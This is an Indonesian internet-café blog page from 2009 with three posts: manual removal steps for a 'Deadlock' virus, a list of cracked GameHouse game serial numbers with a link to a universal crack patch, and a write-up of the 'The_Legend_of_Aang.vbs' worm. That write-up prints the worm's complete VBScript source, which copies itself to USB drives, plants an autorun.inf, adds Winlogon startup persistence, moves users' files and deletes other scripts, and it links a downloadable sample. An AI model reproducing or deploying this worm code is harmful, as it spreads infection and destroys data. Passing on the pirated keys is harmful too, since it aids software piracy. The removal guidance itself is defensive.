Warnet OiziQ Cyber

Jalan Stasiun Rajapolah, Tasikmalaya 46155

Menghapus Virus Deadlock

Virus Deadlock terbilang ganas. Jika komputer sudah terinfeksi, siap-siap saja pada tanggal 12 dan 13 semua data-data Anda akan dihancurkan, baik di hardisk, Flashdisk dan O/S Windows sehingga menampilkan pesan NTLDR is Missing.
Namun jika sudah menjadi korban Deadlock, jangan sekali-kali menginstal ulang OS Anda ke hardisk yang mengandung data yang hilang tersebut. Lakukan proses recovery data penting dengan menggunakan aplikasi data recovery dan metode yang benar.

Sebab, jika Anda menginstal ulang OS ke hardisk yang mengandung data yang ingin direcover, kemungkinan keberhasilan recovery akan sangat rendah.
Namun virus ini juga bisa ditangani dengan cara manual. Berikut 6 langkah singkatnya yang diramu oleh Tim OiziQ Cyber : 
1. Disable [System Restore] selama proses pembersihan.
Klik kanan My Komputer > Pilih Properties > Pilih System Restore > Lalu checklist pada Turn Off System Restore on All Drives. 
2. Matikan proses virus yang aktif di memori, gunakan tools pengganti Task Manager seperti ‘Process Explorer’,kemudian matikan proses yang mempunyai nama mysql.exe dan apache.exe. Silahkan download tools tersebut.
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
3. Agar virus ini tidak dapat aktif kembali sebaiknya blok file tersebut agar tidak dapat dieksekusi dengan mendaftarkan pada Software Restriction Policies. Fitur ini hanya ada pada komputer dengan sistem operasi Windows XP Professional/Windows Server 2003/Windows Vista dan Windows Server 2008.
Caranya:
  • Start — Run ketik perintah SECPOL.MSC kemudian klik tombol [OK]
  • Setelah muncul layar Local Security Settings, klik kanan pada menu Software Restriction Policies lalu klik Create New Policies
  • Pada menu Software Restriction Policies, klik Additional Rules
  • Klik kanan pada Additional Rules, kemudian pilih New Hash Rule, dan akan muncul layar New Hash Rule
  • Pada kolom File hash klik tombol Browse, kemudian arahkan ke direktori [C:\Windows\system32\apache.exe] dan klik tombol [Open]
  • Pada kolom Security level pilih [Disallowed]
  • Pada kolom description boleh di isi atau dikosongkan saja
  • Klik tombol [Apply] dan [Ok]
Catatan: Jika komputer Anda tidak terinstall Windows XP Professional/2003 Server/Vista/2008 lewati langkah ini.
4. Hapus string registry yang sudah diubah oleh virus. Untuk mempercepat proses perbaikan salin script di bawah ini pada program notepad kemudian save as dengan nama repair.inf kemudian jalankan file tersebut dengan cara: Klik kanan file repair.inf lalu pilih Install.

[Version]

Signature=”$Chicago$”
Provider=OiziQ
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKLM, Software\CLASSES\batfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\comfile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\exefile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\piffile\shell\open\command,,,”””%1″” %*”
HKLM, Software\CLASSES\regfile\shell\open\command,,,”regedit.exe “%1″”
HKLM, Software\CLASSES\scrfile\shell\open\command,,,”””%1″” %*”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, “Explorer.exe”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\ControlSet002\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
HKLM, SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer, NoDriveTypeAutoRun,0×000000ff,255
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, apache
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, mysql


5. Hapus file induk virus yang ada di direktori
  • C:\Windows\system32\apache.exe
  • C:\Windows\system32\mysql.exe
6. Untuk pembersihan optimal dan mencegah infeksi ulang, install dan scan dengan menggunakan antivirus yang up-to-date.
Anda juga dapat menggunakan Norman Malware Cleaner, silahkan download tools tersebut. 
http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe
Jika komputer yang terinfeksi Deadlock ini tidak dapat melakukan booting Windows dengan muncul pesan error NTLDR Is Missing, sebaiknya lakukan install ulang.
Sementara untuk data yang telah dihapus silahkan Anda recovery dengan menggunakan software recovery seperti GetData Back/Easy Recovery/Recovery my Files, tetapi hal ini tidak akan menjamin semua data akan dapat diselamatkan.

Serial Number GameHouse

http://www.gamehouse.com
Semua mini game dari gamehouse sebagian besar bisa di patch dengan patch universal
silahkan Download Pacthnya :
http://www.indowebster.com/Gamehouse_Patch_Universal.html

Bila tidak bisa di pacth, silahkan masukkan salah satu serial number dibawah ini

Serial Number
=============
Nama Game : Mysteries Of Horus
Register Name : TitaN
Serial Number : WHDGY8LSLLSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Feeding Frenzy
Register Name : TitaN
Serial Number : GHKF68XWWJSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Feeding Frenzy 2
Register Name : TitaN
Serial Number : SNGJ8P9KTCSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Teddy Factory
Register Name : TitaN
Serial Number : GPER9WTHMFSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Diner Dash
Register Name : TitaN
Serial Number : QQT8PL6NBCSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Diner Dash 2
Register Name : TitaN
Serial Number : 7AVM7L6ECASBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Combo Chaos
Register Name : TitaN
Serial Number : 7LB7FRMC8BSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Pizza Frenzy
Register Name : TitaN
Serial Number : VK7CRMA8MNSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : BigKahuna Reef
Register Name : TitaN
Serial Number : RVB7FGPBEPSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : BigKahuna Reef 2
Register Name : TitaN
Serial Number : HBNL9PJATWSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Fish Tycoon
Register Name : TitaN
Serial Number : CEAEE9BDLXSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Air Strike 3D
Register Name : TitaN
Serial Number : CWNRWTJWBVSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : 10 Talismans
Register Name : TitaN
Serial Number : 6CG9MJJ8CKSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : 7 Wonders + belum
Register Name : TitaN
Serial Number : NN7SRV9FTSSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Adventure Ball
Register Name : TitaN
Serial Number : XRFRP9WRKESBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Alien Sky
Register Name : TitaN
Serial Number : TS8MMBJLNTSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Froggy Castle 2 Deluxe
Register Name : TitaN
Serial Number : WXJXTAHJSSSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Ricochet Lost Worlds Recharged
Register Name : TitaN
Serial Number : MRSC6XLD6WSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Shopmania
Register Name : TitaN
Serial Number : B7ADXGQM6CSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Splash
Register Name : TitaN
Serial Number : HTBM7HDMQNSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : platypus
Register Name : TitaN
Serial Number : QKABBBVG7RSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Legend of Aladin
Register Name : TitaN
Serial Number : HDBPDFJTEWSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Academy of Magic
Register Name : TitaN
Serial Number : P6LKJLPAMJSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Garden Dreams
Register Name : TitaN
Serial Number : TLHENG8KNJSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Fairies
Register Name : TitaN
Serial Number : LQGLXCXHSJSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Bonnies Book Store
Register Name : TitaN
Serial Number : E7NGHX7VLPSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Cake Mania
Register Name : TitaN
Serial Number : TV7T96QXPVSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Spring Sprang Sprung
Register Name : TitaN
Serial Number : AXPYTC7QP7SBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Nama Game : Casino Island
Register Name : TitaN
Serial Number : DKA7PXHLDMSBFBC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Menghapus Virus The_Legend_of_Aang.vbs

sebagian AV lokal dan luar blum bisa mendetect keberadaan virus yg satu ini dengan nama The_Legend_of_Aang.vbs, virus tersebut selain punya ektensi .vbs dia menyebar melalui media flashdisk dan selalu membawa autoran.inf

http://www.virustotal.com/analisis/303fafa464894bb9a7086ed9f9019e45

sample :
http://rapidshare.com/files/219670466/aang.rar.html
Source Code :
Option Explicit
On Error Resume Next
Dim Fso
Set Fso = CreateObject(”Scripting.FileSystemObject”) Dim Shells
Set Shells = CreateObject(”Wscript.Shell”)
Dim WinDir
Set WinDir = Fso.GetSpecialFolder(0)
Dim SystemDir
Set SystemDir =Fso.GetSpecialFolder(1)
Dim File
Set File = Fso.GetFile(WScript.ScriptFullName)
Dim Drv
Set Drv=File.Drive
Dim InDrive
Set InDrive = Fso.drives
Dim ReadAll,AllFile
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline & vbcrlf
Loop
Dim Count
Count=Drv.DriveType
Dim WriteAll
Do
If Not Fso.FileExists(SystemDir & “\Aang.vbs”) then
set WriteAll = Fso.CreateTextFile(SystemDir & “\Aang.vbs”,2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & “\Aang.vbs”)
WriteAll.Attributes = -1
End If
Shells.RegWrite “HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit”,SystemDir & “\userinit.exe,” & _
SystemDir & “\wscript.exe ” & SystemDir & “\Aang.vbs”
Dim Drives
For Each Drives In InDrive
If Drives.DriveType=2 Then
LookVBS “inf”,Drives.Path & “\”
LookVBS “INF”,Drives.Path & “\”
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path “A:” Then
Shells.Regdelete “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”
Shells.RegWrite “HKCU\Software\Microsoft\Internet Explorer\Main\Window Title”,”"
Shells.RegWrite “HKCU\Software\Microsoft\Internet Explorer\Main\Start Page”,”"
Shells.RegWrite “HKCR\vbsfile\DefaultIcon”,”%SystemRoot%\System32\WScript.exe,2″
LookVBS “vbs”,WinDir & “\”
LookVBS “vbs”,Drives.Path & “\”
If Drives.DriveType = 1 Then
If Drives.Path”A:” Then
If Not Fso.FileExists(Drives.Path & “\The_Legend_Of_Aang.vbs”) Then
set writeall=fso.CreateFolder (SystemDir & “\RemovableCache”)
writeall.close
set writeall=fso.copyfolder (Drives.path & “\*”,SystemDir & “\RemovableCache”)
writeall.close
set writeall=fso.moveFile (Drives.path & “\*.*”,SystemDir & “\RemovableCache”)
writeall.close
’set writeall=fso.Deletefolder (Drives.path & “\*”,2)
writeall.close
’set writeall=fso.DeleteFile (Drives.path & “\*.*”,2)
writeall.close
Set WriteAll=Fso.CreateTextFile(Drives.Path & “\The_Legend_Of_Aang.vbs”,2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & “\The_Legend_Of_Aang.vbs”)
WriteAll.Attributes = -1
writeall.close
End If
If Fso.FileExists(Drives.Path & “\autorun.inf”) Or Fso.FileExists(Drives.Path & “\AUTORUN.INF”) Then
Dim Chg
Set Chg = Fso.GetFile(Drives.Path & “\autorun.inf”)
Chg.Attributes = -8
End if
Set WriteAll = Fso.CreateTextFile(Drives.Path & “\autorun.inf”,2,True)
WriteAll.writeline “[Autorun]” & vbcrlf & “UseAutoplay=1″ & vbcrlf & “Icon=%SystemRoot%\system32\SHELL32.dll,7″ & vbcrlf & “Shellexecute=wscript.exe The_Legend_Of_Aang.vbs” & vbCrLf & “Shell\OPEN\COMMAND=wscript.exe The_Legend_Of_Aang.vbs”& VbCrlf &”Shell\explore\COMMAND=wscript.exe The_Legend_Of_Aang.vbs” & VbCrLf & “Action=Open folder to view files”
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & “\autorun.inf”)
WriteAll.Attributes = -1
End If
End if
End if
End If
Next
if Count 1 then
Wscript.sleep 10000
end if
loop while Count1
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject(”Scripting.FileSystemObject”)
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name “The_Legend_Of_Aang.vbs” Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub


untuk membersihkan virus ini berhubung saia pake ansav dan avira karena kedua AV tersebut blum bisa medetect-nya, untuk sementara bisa menggunakan Norman Malware Cleaner yg bisa di download secara free.


Download :
http://normanasa.vo.llnwd.net/o29/public/Norman_Malware_Cleaner.exe 

dibuat : 1 September 2009



Foto saya
Rajapolah, Tasikmalaya, Indonesia

Catatan isi Blog ini :